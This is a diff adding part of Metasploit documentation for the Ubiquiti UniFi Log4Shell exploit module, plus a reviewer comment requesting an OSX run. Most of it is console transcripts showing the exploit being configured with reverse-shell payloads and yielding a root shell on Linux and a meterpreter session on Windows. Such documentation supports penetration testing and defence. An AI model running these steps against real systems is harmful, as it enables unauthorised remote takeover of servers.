documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md

```diff
@@ -0,0 +1,107 @@
+vulnerability. See [jacobalberty/unifi](https://hub.docker.com/r/jacobalberty/unifi) for more information.
+
+
+```
+msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell 
+[*] Using configured payload windows/meterpreter/reverse_tcp
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Linux
+TARGET => Linux
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RHOST 192.168.250.6
+RHOST => 192.168.250.6
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set SRVHOST 192.168.250.134
+SRVHOST => 192.168.250.134
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set LHOST 192.168.250.134
+LHOST => 192.168.250.134
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set PAYLOAD cmd/unix/reverse_bash
+PAYLOAD => cmd/unix/reverse_bash
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RPORT 8443
+RPORT => 8443
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > exploit
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Delivering the serialized Java object to execute the payload...
+[*] Command shell session 5 opened (192.168.250.134:4444 -> 192.168.250.6:44984 ) at 2022-01-14 09:21:04 -0500
+[*] Server stopped.
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+pwd
+/usr/lib/unifi
+```
+
+### Unifi Controler on Windows Server 2016
+
+```
+msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
+[*] Using configured payload windows/meterpreter/reverse_tcp
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Windows
+TARGET => Windows
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RHOST 192.168.159.65
+RHOST => 192.168.159.65
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set SRVHOST 192.168.159.128
+SRVHOST => 192.168.159.128
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RPORT 8443
+RPORT => 8443
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Delivering the serialized Java object to execute the payload...
+[*] Sending stage (175174 bytes) to 192.168.159.65
+[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.65:51940 ) at 2022-01-14 09:19:25 -0500
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: WIN-BPID95ACQ7E\smcintyre
+meterpreter > sysinfo
+Computer        : WIN-BPID95ACQ7E
+OS              : Windows 2016+ (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > 
+```
+
```

Comment:
add in the OSX run: https://github.com/rapid7/metasploit-framework/pull/16053#issuecomment-1017445437